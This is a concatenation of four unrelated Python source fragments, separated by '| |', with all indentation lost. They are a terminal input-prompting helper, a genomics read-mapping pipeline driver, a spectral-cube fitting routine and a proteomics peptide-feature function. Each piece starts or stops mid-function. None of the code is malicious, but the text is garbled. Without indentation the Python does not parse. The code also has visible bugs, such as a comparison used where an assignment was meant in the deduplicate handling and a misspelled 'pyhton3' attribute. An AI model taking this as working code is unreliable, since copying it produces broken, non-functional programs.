str: The value selected by the user.
"""
# update option text to include help message
option_text = option_text or ''
if option_text:
# add space for cleaness in user display
option_text = f' {option_text}'
print(f'{c.Fore.WHITE}[? for help]')
prompt = f'{c.Fore.MAGENTA}{label}{c.Fore.RESET}{c.Style.BRIGHT}{option_text}: '
input_value = input(prompt).strip() # nosec
# handle special user inputs
if input_value == '?':
self.present_help()
return self._input_value(label, option_text)
return input_value
@staticmethod
def _split_list(data: list) -> tuple:
"""Split a list in two "equal" parts.
Args:
data: The list of data to split into two equal parts.
Returns:
tuple: The two halves of the list.
"""
half: int = math.ceil(len(data) / 2)
return data[:half], data[half:]
def add_input(self, name: str, data: dict, value: str) -> None:
"""Add an input to inputs.
Args:
name: The name of the input.
data: The install.json params object.
value: The value for the input.
"""
if data.get('required', False):
self._inputs['required'].setdefault(name, value)
else:
self._inputs['optional'].setdefault(name, value)
# def add_user_default(self, key, value, data_type=None):
# """Add data to user default."""
# self.user_defaults.setdefault(self.profile.feature, {})
# if data_type is None:
# self.user_defaults[self.profile.feature][key] = value
# else:
# # store the value under the appropriate data type
# self.user_defaults[self.profile.feature].setdefault(key, {})
# self.user_defaults[self.profile.feature][key].setdefault(data_type, value)
# if self.user_defaults.get('base') is None:
# self.user_defaults['base'] = self.user_defaults[self.profile.feature]
def add_staging_data(self, name: str, type_: str, value: str) -> str:
"""Create staging data and return variable value.
Args:
name: The name of the input.
type_: The type of input (Binary, StringArray, etc.)
value: The value to write in the staging data.
Returns:
str: The newly create variable string.
"""
arg_value = value
if (
self.profile.ij.runtime_level.lower() not in ['triggerservice', 'webhooktriggerservice']
and value is not None
):
arg_value: str = self.profile.ij.create_variable(name, type_)
self._staging_data['kvstore'].setdefault(arg_value, value)
return arg_value
def collect_binary(self, **kwargs) -> str:
"""Collect binary data
Args:
default (str, kwargs): The default value if no value provided by user.
feedback (bool, kwargs): If True user feedback will be printed.
option_text (str, kwargs): The text shown to the user.
required (str, kwargs): If True the user cannot continue until they provide a value.
Returns:
str: The input str from the user.
"""
input_value: str = self._input_value('Input', kwargs.get('option_text'))
if not input_value:
# if no default value and required force user to input again
if kwargs.get('default') is None and kwargs.get('required') is True:
self.print_required()
return self.collect_binary(**kwargs)
if input_value not in [None, '']:
input_data: str = b64encode(input_value.encode()).decode()
feedback = f'{input_value} -> ({input_data})'
else:
input_data: str = kwargs.get('default')
feedback = input_data
# print user feedback
if kwargs.get('feedback', True):
self.print_feedback(feedback)
return input_data
def collect_binary_array(self, **kwargs) -> list:
"""Collect binary array data
Args:
required (str, kwargs): If True the user cannot continue until they provide a value.
Returns:
list: The input list from the user.
"""
input_values = []
required = kwargs.get('required', False)
while True:
input_value = self.collect_binary(feedback=False, required=required)
if not input_value:
break
input_values.append(input_value)
required = False # only the first input is required
if not input_values:
# return None to ensure data doesn't get added to inputs
input_values = None
# print user feedback
self.print_feedback(input_values)
return input_values
def collect_boolean(self, **kwargs) -> bool:
"""Collect binary data
Args:
default (str, kwargs): The default value if no value provided by user.
option_text (str, kwargs): The text shown to the user.
Returns:
bool: The boolean value select by the user.
"""
input_value = self._input_value('Input', kwargs.get('option_text'))
if input_value == '':
input_value = kwargs.get('default')
if str(input_value).lower() not in ['0', 'f', 'false', '1', 't', 'true']:
self.print_invalid_bool()
return self.collect_boolean(**kwargs)
# covert input value to a proper boolean
input_value = self.profile.utils.to_bool(input_value)
# print user feedback
self.print_feedback(input_value)
return input_value
def collect_editchoice(self, **kwargs) -> str:
"""Collect edit choice data
Args:
default (str, kwargs): The default value if no value provided by user.
option_text (str, kwargs): The text shown to the user.
required (str, kwargs): If True the user cannot continue until they provide a value.
valid_values (str, kwargs): A list of valid values
Returns:
str: The users selected choice.
"""
# collect input value from user and set default if required
input_value: str = self._input_value('EditChoice', kwargs.get('option_text')) or kwargs.get(
'default'
)
# ensure input value is provided when input is required
if input_value is None and kwargs.get('required') is True:
self.print_required()
return self.collect_editchoice(**kwargs)
# if input value is None then there is not need to continue
if input_value is None:
return input_value
# set valid values
valid_values: list = kwargs.get('valid_values', [])
# convert to int or recollect input
try:
input_value = int(input_value)
is_between = 0 <= input_value <= (len(valid_values) - 1)
if not is_between:
self.print_invalid_index(f'0-{len(valid_values)}')
return self.collect_editchoice(**kwargs)
input_value = valid_values[input_value]
if input_value == self._no_selection_text:
# special case for when user select no selection
input_value = None
except ValueError:
self.print_feedback(f'Using custom input {input_value}.')
# print user feedback
if kwargs.get('feedback', True):
self.print_feedback(input_value)
return input_value
def collect_choice(self, **kwargs) -> str:
"""Collect choice data
Args:
default (str, kwargs): The default value if no value provided by user.
option_text (str, kwargs): The text shown to the user.
required (str, | |
#!/usr/bin/env python3
from __future__ import division, print_function
from string import Template
from CommandRunner import *
from ECUtils import *
import tempfile
import xml.etree.ElementTree as ET
import logging
import sys,os,re
import subprocess
import signal
import argparse
import string
import glob
import traceback
import random
class Protocol(object):
def __init__(self,protocol):
"""
Take XML input and parse it. Set Instance atributes to what
you want them to be
"""
self.protocol=protocol
self.parseProtocol()
def parseProtocol(self):
try:
p=ET.parse(self.protocol)
except:
logging.critical("Input protocol not formatted correctly at {}".format(self.protocol))
sys.exit(1)
#parse the input and check sanity
Reference=p.find('reference')
if Reference is None:
logging.error('Reference not correctly provided in protocol at {}'.format(self.protocol))
self.reference=Reference.text
if not os.path.exists(self.reference):
logging.critical('The provided reference at {} does not exist'.format(self.reference))
sys.exit(1)
InBaseDir=p.find('input')
if InBaseDir is None:
logging.critical('Input directory not correctly provided in protocol at {}'.format(self.protocol))
sys.exit(1)
if "baseDir" in InBaseDir.attrib:
self.inBaseDir=InBaseDir.attrib["baseDir"]
else:
self.inBaseDir=''
Pair1=InBaseDir.find('p1')
Pair2=InBaseDir.find('p2')
NPairs=InBaseDir.find('nPairs')
deduplicate=InBaseDir.find('deduplicate')
if Pair1 is None:
logging.critical('Read file not correctly provided in protocol at {}'.format(self.protocol))
sys.exit(1)
self.pair1=os.path.join(self.inBaseDir,Pair1.text)
if Pair2 is None:
self.pair2=None
else:
self.pair2=os.path.join(self.inBaseDir,Pair2.text)
if NPairs is None:
logging.critical('Must provide number of read pairs in protocol at {}\n'\
'\tEg: run cat yourReadFile.fq | grep \'^@\' | wc -l'.format(self.protocol))
sys.exit(1)
#self.pair1=os.path.join(self.inBaseDir,Pair1.text)
self.nPairs=int(NPairs.text)
absentPair=None
if not os.path.exists(self.pair1):
absentPair=self.pair1
elif self.pair2 is not None and not os.path.exists(self.pair2):
absentPair=self.pair2
if absentPair:
logging.critical('The provided readfile at {} does not exist'.format(absentPair))
sys.exit(1)
if deduplicate is not None:
if deduplicate.text=='true':
self.deduplicate=True
elif self.deduplicate=='false':
self.deduplicate==False
else:
logging.critical("The deduplicate tag may only have the values"\
"'true' or 'false'. The provided value is"\
"'{}'".format(deduplicate.text))
else:
self.deduplicate=False
ploidy=p.find('ploidy')
if ploidy is None:
logging.warn('No ploidy was provided in the protocol. Assuming a diploid sample!')
self.ploidy=2
else:
self.ploidy=ploidy.text
Outdir=p.find('outputDir')
if Outdir is None:
self.outDir=os.getcwd()
else:
self.outDir=Outdir.text
NThreads=p.find('threads')
if NThreads is not None:
self.nThreads=NThreads.text
else:
self.nThreads='1'
Cluster=p.find('cluster')
if Cluster==None:
self.cmdTemplate=None
self.nJobs=0
else:
if Cluster.find('nJobs') is not None:
self.nJobs=int(Cluster.find('nJobs').text)
else:
self.nJobs=0
if Cluster.find('template') is None:
logging.critical('Cluster tag provided but template absent at {}'.format(self.protocol))
sys.exit(1)
else:
self.cmdTemplate=Cluster.find('template').text
paths=p.find('paths')
#where is the base directory of our scripts?
if paths.find('scripts') is not None:
self.scriptBase=paths.find('scripts').text
else:
logging.critical("You need to provide the 'scripts' tag within the"\
" 'paths' tag in the protocol!")
#Get minimum qual valiues for indelx and snv
minSNVQ=p.find('minSNVQ')
if minSNVQ is not None:
self.minSNVQ=int(minSNVQ.text)
else:
self.minSNVQ=30
minIndelQ=p.find('minIndelQ')
if minIndelQ is not None:
self.minIndelQ=int(minIndelQ.text)
else:
self.minIndelQ=30
#set default paths
self.bwa='bwa'
self.samtools='samtools'
self.picardtools='picard.jar'
self.gatk='gatk'
self.pyhton3='python3'
self.tmpdir='$TMPDIR'
self.java='java'
#reset defaults if paths were defined
if paths is not None:
if paths.find('bwa') is not None:
self.bwa=paths.find('bwa').text
if paths.find('samtools') is not None:
self.samtools=paths.find('samtools').text
if paths.find('picardtools') is not None:
self.picardtools=paths.find('picardtools').text
if paths.find('gatk') is not None:
self.gatk=paths.find('gatk').text
if paths.find('java') is not None:
self.java=paths.find('java').text
if paths.find('python3') is not None:
self.python3=paths.find('python3').text
if paths.find('tmpdir') is not None:
self.tmpdir=paths.find('tmpdir').text
#set javas tmpdir directly in the attribute so, we don't have to
#do it each time we construct the command
self.java+=' -Djava.io.tmpdir={}'.format(self.tmpdir)
class StageDriver(object):
'''
This object holds the command construction methods for all stages of the
pipeline. These methods don't do any computation by themselves, but build
the commands to call the scripts that do.
'''
def __init__(self, protocolFile, stage, piped):
#how are we and our protocol called?
self.name=sys.argv[0]
self.protocolName=protocolFile
#parse the protocol
self.stage=stage
self.piped=piped
self.MyProtocol=Protocol(protocolFile)
self.runCmd = CommandRunner(self.MyProtocol.cmdTemplate, \
self.MyProtocol.nJobs)
#detect in what iteration we are currently at
iterationFolders=[i.replace('ITERATION_', '') \
for i in glob.glob(os.path.join(self.MyProtocol.outDir,\
'ITERATION_*'))]
#catch exception if theres no iterationfolder yet
try:
self.iteration=max(sorted(map(lambda f: int(f), \
map(lambda f: os.path.basename(f),\
iterationFolders))))
except ValueError:
self.iteration=1
self.baseDir=os.path.join(self.MyProtocol.outDir,\
"ITERATION_{}".format(self.iteration))
if not os.path.exists(self.baseDir):
os.mkdir(self.baseDir)
self.stages=['setup', 'index', 'map', 'merge', 'prepvarcall', 'varcall', \
'varintegration', 'reindex', 'remap', 'remerge', 'correction']
self.stage=stage
#try to get the next stage:
try:
self.nextStage=self.stages[self.stages.index(stage)+1]
except IndexError:
#if the stage is correction, the next one is index in next iter
self.nextStage='index'
#try to get the previsprevious stage:
try:
previousStage=self.stages[self.stages.index(stage)-1]
except IndexError:
previousStage=None
#get/create the stage specific directory
if previousStage is not None:
self.previousStageDir=os.path.join(self.baseDir, previousStage)
self.stageDir=os.path.join(self.baseDir, stage)
#if stage is setup, set the thing outside of the nestings:
if stage=='setup':
self.stageDir=os.path.join(self.MyProtocol.outDir, 'setup')
#we're gonna need the path to the index directory sometimes:
self.indexDir=os.path.join(self.baseDir, 'index')
#create the directory for the current stage, put setup outside of nestings
if not os.path.exists(self.stageDir):
os.mkdir(self.stageDir)
#if the directory exists and is not empty, we're not touching it..
elif os.listdir(self.stageDir) != []:
logging.critical('Stage directory {} for iteration {} exists and '\
'is not empty! Please check its contents and '\
'delete them if necessary.'.format(self.stage, self.iteration))
logging.critical('Exiting...')
sys.exit(1)
#run stage
if stage=="setup":
commands, wDir=self.setup()
elif stage=="index":
commands, wDir=self.index(self.iteration, reindex=False, piped=self.piped)
elif stage=="reindex":
commands, wDir=self.index(self.iteration, reindex=True, piped=self.piped)
elif stage=="map":
commands, wDir=self.mapping(self.iteration, remap=False)
elif stage=="remap":
commands, wDir=self.mapping(self.iteration, remap=True)
elif stage=="merge":
commands, wDir=self.merge_bam(self.iteration, remerge=False, piped=self.piped)
elif stage=="remerge":
commands, wDir=self.merge_bam(self.iteration, remerge=True, piped=self.piped)
elif stage=="prepvarcall":
commands, wDir=self.prep_varcall(self.iteration, piped=self.piped)
elif stage=="varcall":
commands, wDir=self.varcall(self.iteration)
elif stage=="varintegration":
commands, wDir=self.varintegration(self.iteration, piped=self.piped)
elif stage=="correction":
commands, wDir=self.correction(self.iteration, piped=self.piped)
else:
#because calls to non existing stages should be filtered by argparser
logging.warning('Man..this error should really really not occur...')
sys.exit(1)
#autocall next stage for unscattered stages
if self.piped and wDir==None:
nextStageCmd=self.selfCall(self.nextStage)
commands=self.constructCommand(self.stage, commands+nextStageCmd)
wDir=self.stageDir
logging.debug("CommandRunner Returned: " +
str(self.runCmd(commands, wDir, self.stage )) )
logging.info("Finished %s Stage: %s" % (self.runCmd.runType, self.stage))
##############################
####STAGE DRIVER FUNCTIONS####
##############################
def setup(self):
'''
create job to check headers of reference and
chunk up readfiles if necesary
'''
#readDir=os.path.join(self.MyProtocol.outDir,'READS')
readDir=self.stageDir
retCmd = list()
setupScript=os.path.join(self.MyProtocol.scriptBase, \
'ECsetup.py')
logging.info('Calling setup script located at {}'.format(setupScript))
cmd=string.Template('${ECSetupPath} ${reference} '\
'${pair1} ${pair2} ${outDir} ${nPairs}').\
substitute({'ECSetupPath': setupScript,\
'reference': self.MyProtocol.reference,\
'pair1': self.MyProtocol.pair1,\
'pair2': self.MyProtocol.pair2,\
'outDir': readDir,\
'nPairs': self.MyProtocol.nPairs})
if self.MyProtocol.nJobs is not None:
cmd+=' -nChunks {}'.format(self.MyProtocol.nJobs)
cmd+=';\n'
logging.debug("Running command: {}".format(cmd))
retCmd.append(Command(cmd, 'setup', os.path.join(readDir,"setup.out"), \
os.path.join(readDir,"setup.err")))
return retCmd, readDir
def index(self, iteration, reindex=False, piped=False):
'''
create job to index a reference
reference nomenclature:
first pass: reference.fa
after varcall: reference.varcall.integrated.fa
after qc: reference.varcall.PASS.fa
'''
retCmd=list()
#!!create sequence dict and fai !!
if not reindex:
#reference=os.path.join(self.baseDir,'reference.fa')
reference=os.path.join(self.stageDir,'reference.fa')
if iteration==1:
# if not os.path.exists(self.baseDir):
# os.mkdir(self.baseDir)
os.symlink(self.MyProtocol.reference, reference)
#build command
elif iteration!=1:
lastPass=os.path.join(*[self.MyProtocol.outDir, \
'ITERATION_{}'.format(iteration-1),\
'correction',\
'reference.sanitizedVariants.fa'])
os.symlink(lastPass, reference)
else:
# reference=os.path.join(self.baseDir, 'reference.varcall.integrated.fa')
reference=os.path.join(self.previousStageDir, 'reference.varcall.integrated.fa')
varRef=os.path.join(self.stageDir, 'reference.varcall.integrated.fa')
os.symlink(reference, varRef)
reference=varRef
if reference.endswith('fasta'):
seqdict=reference.replace(".fasta", ".dict")
elif reference.endswith('.fa'):
seqdict=reference.replace(".fa", ".dict")
if reindex:
cmd=string.Template('${bwa} index ${reference};\n')\
.substitute({'bwa': self.MyProtocol.bwa,
'reference': reference})
else:
cmd=string.Template('${bwa} index ${reference}\n'\
'${samtools} faidx ${reference};\n'\
'${java} -jar ${picard} CreateSequenceDictionary '\
'R=${reference} O=${seqdict};\n')\
.substitute({'bwa': self.MyProtocol.bwa,
'reference': reference,
'samtools': self.MyProtocol.samtools,
'java': self.MyProtocol.java,
'picard': self.MyProtocol.picardtools,
'seqdict': seqdict})
#if were piping stages, just retrun the command string
if piped:
return cmd, None
#else construct the command actual command object
j='reindex' if reindex else 'index'
stdout=os.path.join(self.baseDir, j+".out")
stderr=os.path.join(self.baseDir, j+".err")
retCmd.append(Command(cmd,j,stdout, stderr))
return retCmd, self.stageDir
def mapping(self, iteration, remap=False):
'''create mapping jobs for all pairs in reads folder'''
retCmd=list()
if remap:
outfileSuffix='_remap.bam'
# reference=os.path.join(self.baseDir, 'reference.varcall.integrated.fa')
reference=os.path.join(self.previousStageDir, \
'reference.varcall.integrated.fa')
else:
outfileSuffix='_map.bam'
reference=os.path.join(self.previousStageDir,'reference.fa')
# if not os.path.exists(self.baseDir):
# os.mkdir(self.baseDir)
#build commands
cmdTemplate=string.Template("${bwa} mem -M -t ${threads} -R"\
"'@RG\\tID:dummy\\tSM:dummy\\tLB:dummy' "\
"${reference} ${pair1} ${pair2} |"\
"${samtools} view -@ ${threads} -Shb - |"\
"${samtools} sort -@ ${threads} -O bam "\
"-T ${tmpBam} -o ${outfile} -;\n")
readDir=os.path.join(os.path.join(self.MyProtocol.outDir, 'setup'))
pairNames=set()
if not os.path.exists(readDir):
logging.critical("Read directory does not exist. Did you run the setup stage?")
sys.exit(1)
pairs=glob.glob(os.path.join(readDir, '*.fq'))
if not pairs:
logging.critical("There are no read pairs in {}".format(readDir))
sys.exit(1)
#get basenames of pairs and remove .p[12].fq
pairs=set(os.path.basename(re.sub('.p[12].fq', '', pair)) for pair in pairs)
for pairPrefix in pairs:
#check if we're dealing with single end reads
if self.MyProtocol.pair2==None:
pair2=''
else:
pair2=os.path.join(readDir,pairPrefix+'.p2.fq')
randString=''.join(random.choice(string.ascii_uppercase + string.digits)\
for _ in range(6))
cmd=cmdTemplate.substitute({'bwa': self.MyProtocol.bwa,\
'samtools': self.MyProtocol.samtools,\
'threads': self.MyProtocol.nThreads,\
'reference':reference,\
'pair1': os.path.join(readDir,\
pairPrefix\
+'.p1.fq'),
'pair2': pair2,\
'tmpBam': os.path.join(self.stageDir,
randString),
'outfile': os.path.join(self.stageDir,\
pairPrefix+\
outfileSuffix)})
j='remap' if remap else 'map'
jobname=j
stdout=os.path.join(self.stageDir, j+'.out')
stderr=os.path.join(self.stageDir, j+'.err')
logging.debug('Executing {}'.format(cmd))
Command(cmd, jobname, stdout, stderr)
retCmd.append(Command(cmd, j, stdout, stderr))
return retCmd, self.stageDir
def merge_bam(self, iteration, remerge=False, piped=False):
'''
construct command to merge bamfiles
*_map.bam -> first mapping
*_remap.bam -> second mapping for coverage
also create index
'''
retCmd=list()
if not remerge:
bamFilesList=glob.glob(os.path.join(self.previousStageDir,'*_map.bam'))
bamout=os.path.join(self.stageDir,'merged.map.bam')
deduped=os.path.join(self.stageDir,'merged.map.deduped.bam')
else:
bamFilesList=glob.glob(os.path.join(self.previousStageDir,'*_remap.bam'))
bamout=os.path.join(self.stageDir,'merged.remap.bam')
deduped=os.path.join(self.stageDir,'merged.remap.deduped.bam')
#set some paths
bamFiles=" ".join(bamFilesList)
metrics=os.path.join(self.stageDir,'dedupmetrics.txt')
pair1=os.path.join(*[self.MyProtocol.outDir, 'setup', 'pair1.deduped.fq'])
| |
self.parcube[:,int(y),int(x)] = blank_value
self.errcube[:,int(y),int(x)] = blank_value
if integral:
self.integralmap[:,int(y),int(x)] = blank_value
self._counter += 1
if verbose:
if ii % (min(10**(3-verbose_level),1)) == 0:
snmsg = " s/n=%5.1f" % (max_sn) if max_sn is not None else ""
npix = len(valid_pixels)
pct = 100 * (ii+1.0)/float(npix)
log.info("Finished fit %6i of %6i at (%4i,%4i)%s. Elapsed time is %0.1f seconds. %%%01.f" %
(ii+1, npix, x, y, snmsg, time.time()-t0, pct))
if sp.specfit.modelerrs is None:
log.exception("Fit number %i at %i,%i failed with no specific error." % (ii,x,y))
if hasattr(sp.specfit, 'mpfit_status'):
log.exception("mpfit status is {0}".format(sp.specfit.mpfit_status))
log.exception("The problem is that the model errors were never set, "
"which implies that the fit simply failed to finish.")
log.exception("The string representation of `sp.specfit.parinfo` is: {0}"
.format(sp.specfit.parinfo))
log.exception("The string representation of `sp.specfit.fitter.parinfo` is: {0}"
.format(sp.specfit.fitter.parinfo))
log.exception("modelpars is: {0}".format(str(sp.specfit.modelpars)))
log.exception("cube modelpars are: {0}".format(str(self.parcube[:,int(y),int(x)])))
log.exception("cube modelerrs are: {0}".format(str(self.errcube[:,int(y),int(x)])))
log.exception("Guesses were: {0}".format(str(gg)))
log.exception("Fitkwargs were: {0}".format(str(fitkwargs)))
if skip_failed_fits:
# turn the flag into a count
log.exception("The fit never completed; something has gone wrong. Failed fits = {0}".format(int(skip_failed_fits)))
else:
raise TypeError("The fit never completed; something has gone wrong.")
# blank out the errors (and possibly the values) wherever they are zero = assumed bad
# this is done after the above exception to make sure we can inspect these values
if blank_value != 0:
self.parcube[self.parcube == 0] = blank_value
self.errcube[self.parcube == 0] = blank_value
if integral:
return ((x,y), sp.specfit.modelpars, sp.specfit.modelerrs,
self.integralmap[:,int(y),int(x)])
else:
return ((x,y), sp.specfit.modelpars, sp.specfit.modelerrs)
#### BEGIN TEST BLOCK ####
# This test block is to make sure you don't run a 30 hour fitting
# session that's just going to crash at the end.
# try a first fit for exception-catching
if len(start_from_point) == 2:
try0 = fit_a_pixel((0,start_from_point[0], start_from_point[1]))
else:
try0 = fit_a_pixel((0,valid_pixels[0][0],valid_pixels[0][1]))
try:
len_guesses = len(self.momentcube) if (usemomentcube or
guesses_are_moments) else len(guesses)
assert len(try0[1]) == len_guesses == len(self.parcube) == len(self.errcube)
assert len(try0[2]) == len_guesses == len(self.parcube) == len(self.errcube)
except TypeError as ex:
if try0 is None:
raise AssertionError("The first fitted pixel did not yield a "
"fit. Please try starting from a "
"different pixel.")
else:
raise ex
except AssertionError:
raise AssertionError("The first pixel had the wrong fit "
"parameter shape. This is probably "
"a bug; please report it.")
# This is a secondary test... I'm not sure it's necessary, but it
# replicates what's inside the fit_a_pixel code and so should be a
# useful sanity check
x,y = valid_pixels[0]
sp = self.get_spectrum(x,y)
sp.specfit.Registry = self.Registry # copy over fitter registry
# this reproduced code is needed because the functional wrapping
# required for the multicore case prevents gg from being set earlier
if usemomentcube or guesses_are_moments:
gg = self.momentcube[:,int(y),int(x)]
elif hasattr(guesses,'shape') and guesses.shape[1:] == self.cube.shape[1:]:
gg = guesses[:,int(y),int(x)]
else:
gg = guesses
# This is NOT in a try/except block because we want to raise the
# exception here if an exception is going to happen
sp.specfit(guesses=gg, **fitkwargs)
if prevalidate_guesses:
if guesses.ndim == 3:
for ii,(x,y) in ProgressBar(tuple(enumerate(valid_pixels))):
pinf, _ = sp.specfit.fitter._make_parinfo(parvalues=guesses[:,int(y),int(x)], **fitkwargs)
sp.specfit._validate_parinfo(pinf, 'raise')
else:
pinf, _ = sp.specfit.fitter._make_parinfo(parvalues=guesses, **fitkwargs)
sp.specfit._validate_parinfo(pinf, 'raise')
#### END TEST BLOCK ####
if multicore > 1:
sequence = [(ii,x,y) for ii,(x,y) in tuple(enumerate(valid_pixels))]
with np.errstate(divide='raise'):
result = parallel_map(fit_a_pixel, sequence, numcores=multicore)
self._result = result # backup - don't want to lose data in the case of a failure
# a lot of ugly hacking to deal with the way parallel_map returns
# its results needs TWO levels of None-filtering, because any
# individual result can be None (I guess?) but apparently (and this
# part I don't believe) any individual *fit* result can be None as
# well (apparently the x,y pairs can also be None?)
merged_result = [core_result for core_result in result if
core_result is not None]
# for some reason, every other time I run this code, merged_result
# ends up with a different intrinsic shape. This is an attempt to
# force it to maintain a sensible shape.
try:
if integral:
((x,y), m1, m2, intgl) = merged_result[0]
else:
((x,y), m1, m2) = merged_result[0]
except ValueError:
if verbose > 1:
log.exception("ERROR: merged_result[0] is {0} which has the"
" wrong shape".format(merged_result[0]))
merged_result = itertools.chain.from_iterable(merged_result)
for TEMP in merged_result:
if TEMP is None:
# this shouldn't be possible, but it appears to happen
# anyway. parallel_map is great, up to a limit that was
# reached long before this level of complexity
log.debug("Skipped a None entry: {0}".format(str(TEMP)))
continue
try:
if integral:
((x,y), modelpars, modelerrs, intgl) = TEMP
else:
((x,y), modelpars, modelerrs) = TEMP
except TypeError:
# implies that TEMP does not have the shape ((a,b),c,d)
# as above, shouldn't be possible, but it happens...
log.debug("Skipped a misshapen entry: {0}".format(str(TEMP)))
continue
if ((len(modelpars) != len(modelerrs)) or
(len(modelpars) != len(self.parcube))):
raise ValueError("There was a serious problem; modelpar and"
" error shape don't match that of the "
"parameter cubes")
if ((any([x is None for x in modelpars]) or
np.any(np.isnan(modelpars)) or
any([x is None for x in modelerrs]) or
np.any(np.isnan(modelerrs)))):
self.parcube[:,int(y),int(x)] = np.nan
self.errcube[:,int(y),int(x)] = np.nan
self.has_fit[int(y),int(x)] = False
else:
self.parcube[:,int(y),int(x)] = modelpars
self.errcube[:,int(y),int(x)] = modelerrs
self.has_fit[int(y),int(x)] = max(modelpars) > 0
if integral:
self.integralmap[:,int(y),int(x)] = intgl
else:
for ii,(x,y) in enumerate(valid_pixels):
fit_a_pixel((ii,x,y))
# March 27, 2014: This is EXTREMELY confusing. This isn't in a loop...
# make sure the fitter / fittype are set for the cube
# this has to be done within the loop because skipped-over spectra
# don't ever get their fittypes set
self.specfit.fitter = sp.specfit.fitter
self.specfit.fittype = sp.specfit.fittype
self.specfit.parinfo = sp.specfit.parinfo
if verbose:
log.info("Finished final fit %i. "
"Elapsed time was %0.1f seconds" % (len(valid_pixels), time.time()-t0))
pars_are_finite = np.all(np.isfinite(self.parcube), axis=0)
# if you see one of these exceptions, please try to produce a minimum
# working example and report it as a bug.
# all non-finite fit parameters should be has_fit=False
assert np.all(~self.has_fit[~pars_are_finite]), "Non-finite parameters found in fits"
def momenteach(self, verbose=True, verbose_level=1, multicore=1, **kwargs):
"""
Return a cube of the moments of each pixel
Parameters
----------
multicore: int
if >1, try to use multiprocessing via parallel_map to run on multiple cores
"""
if not hasattr(self.mapplot,'plane'):
self.mapplot.makeplane()
if 'vheight' not in kwargs:
kwargs['vheight'] = False
yy,xx = np.indices(self.mapplot.plane.shape)
if isinstance(self.mapplot.plane, np.ma.core.MaskedArray):
OK = (~self.mapplot.plane.mask) * self.maskmap
else:
OK = np.isfinite(self.mapplot.plane) * self.maskmap
valid_pixels = zip(xx[OK],yy[OK])
# run the moment process to find out how many elements are in a moment
_temp_moment = self.get_spectrum(yy[OK][0],xx[OK][0]).moments(**kwargs)
self.momentcube = np.zeros((len(_temp_moment),)+self.mapplot.plane.shape)
t0 = time.time()
def moment_a_pixel(iixy):
ii,x,y = iixy
sp = self.get_spectrum(x,y)
self.momentcube[:,int(y),int(x)] = sp.moments(**kwargs)
if verbose:
if ii % 10**(3-verbose_level) == 0:
log.info("Finished moment %i. "
"Elapsed time is %0.1f seconds" % (ii, time.time()-t0))
return ((x,y), self.momentcube[:,int(y),int(x)])
if multicore > 1:
sequence = [(ii,x,y) for ii,(x,y) in tuple(enumerate(valid_pixels))]
result = parallel_map(moment_a_pixel, sequence, numcores=multicore)
merged_result = [core_result.tolist()
for core_result in result
if core_result is not None]
for TEMP in merged_result:
((x,y), moments) = TEMP
self.momentcube[:,int(y),int(x)] = moments
else:
for ii,(x,y) in enumerate(valid_pixels):
moment_a_pixel((ii,x,y))
if verbose:
log.info("Finished final moment %i. "
"Elapsed time was %0.1f seconds" % (OK.sum(), time.time()-t0))
def show_moment(self, momentnumber, **kwargs):
"""
If moments have been computed, display them in the mapplot window
"""
if not hasattr(self,'momentcube'):
raise ValueError("Compute moments first")
self.mapplot.plane = self.momentcube[momentnumber,:,:].squeeze()
self.mapplot(estimator=None, **kwargs)
def show_fit_param(self, parnumber, **kwargs):
"""
If pars have been computed, display them in the mapplot window
Parameters
----------
parnumber : int
The index of the parameter in the parameter cube
"""
if not hasattr(self,'parcube'):
raise ValueError("Compute fit parameters first")
self.mapplot.plane = self.parcube[parnumber,:,:].squeeze()
self.mapplot(estimator=None, **kwargs)
def load_model_fit(self, fitsfilename, npars, npeaks=1, fittype=None,
_temp_fit_loc=(0,0)):
"""
Load a parameter + error cube into the ``.parcube`` and ``.errcube``
attributes. The models can then be examined and plotted using
``.mapplot`` as if you had run ``.fiteach``.
Parameters
----------
fitsfilename : str
The filename containing the parameter cube written with `write_fit`
npars : int
The number of parameters in the model fit for a single spectrum
npeaks : int
The number of independent peaks fit toward each spectrum
fittype : str, | |
count
def generate_Prophet_features_sip_diff(lPsm, config_dict):
# get some statistics
global num_forward_psms_before_filtering
num_forward_psms_before_filtering = 0
for one_psm in lPsm:
if one_psm.RealLabel == LabelFwd:
num_forward_psms_before_filtering += 1
simple_feature_bool = False
if float(num_forward_psms_before_filtering)/float(len(lPsm)) > 0.7 and len(lPsm) > 1500000:
simple_feature_bool = True
# peptide with PTM dictionary is for IPSC, identified peptide
peptide_with_modification_dict = {}
# peptide without PTM dictionary is for OPSC, original peptide
peptide_dict = {}
peptide_protein_dict = {}
# psm_set = Set()
for oPsm in lPsm:
oPsm.NMC = get_num_missed_cleavage_sites(oPsm.OriginalPeptide,
config_dict[pep_iden_str + cleave_after_residues_str],
config_dict[pep_iden_str + cleave_before_residues_str])
if oPsm.IdentifiedPeptide in peptide_with_modification_dict:
peptide_with_modification_dict[oPsm.IdentifiedPeptide].append(oPsm.pct_s)
else:
peptide_with_modification_dict[oPsm.IdentifiedPeptide] = [oPsm.pct_s]
if oPsm.OriginalPeptide in peptide_protein_dict:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
for protein in oPsm.protein_list:
if protein not in pro_list:
pro_list.append(protein)
else:
pro_list = []
for pro in oPsm.protein_list:
if pro not in pro_list:
pro_list.append(pro)
peptide_protein_dict[oPsm.OriginalPeptide] = pro_list
pattern = re.compile('[^\w\[\]]')
for key, _value in peptide_with_modification_dict.iteritems():
peptide_str = pattern.sub('', key)
if peptide_str in peptide_dict:
# peptide_dict[peptide_str] += 1
peptide_dict[peptide_str] += _value
else:
# peptide_dict[peptide_str] = 1
peptide_dict[peptide_str] = _value
# # sibling peptides
pro_unique_dict = {} # number of unique peptide of a protain
pro_shared_dict = {} # number of shared peptide of a protain
# debug
pro_balanced_shared_dict = {}
# debug
num_changed = 0
changed_flag = False
# psm_set.clear()
pro_pep_dict = {}
pro_unique_pep_dict = {}
pro_shared_pep_dict = {}
for oPsm in lPsm:
pro_list = peptide_protein_dict[oPsm.OriginalPeptide]
changed_flag = False
print_flag = True
for protein in pro_list:
if not protein in oPsm.protein_list:
changed_flag = True
if not print_flag:
print(pro_list)
print(oPsm.protein_list)
print_flag = True
oPsm.protein_list.append(protein)
if len(oPsm.protein_list) != len(pro_list):
print('check 4')
print(oPsm.protein_list)
print(pro_list)
exit(1)
if changed_flag:
oPsm.set_protein_names()
oPsm.RealLabel = get_protein_type(oPsm.ProteinNames)
# print(oPsm.OriginalPeptide)
num_changed += 1
if len(pro_list) > 1:
num_pro_float = float(len(pro_list))
for protein in pro_list:
if protein in pro_shared_dict:
pro_shared_dict[protein] += 1
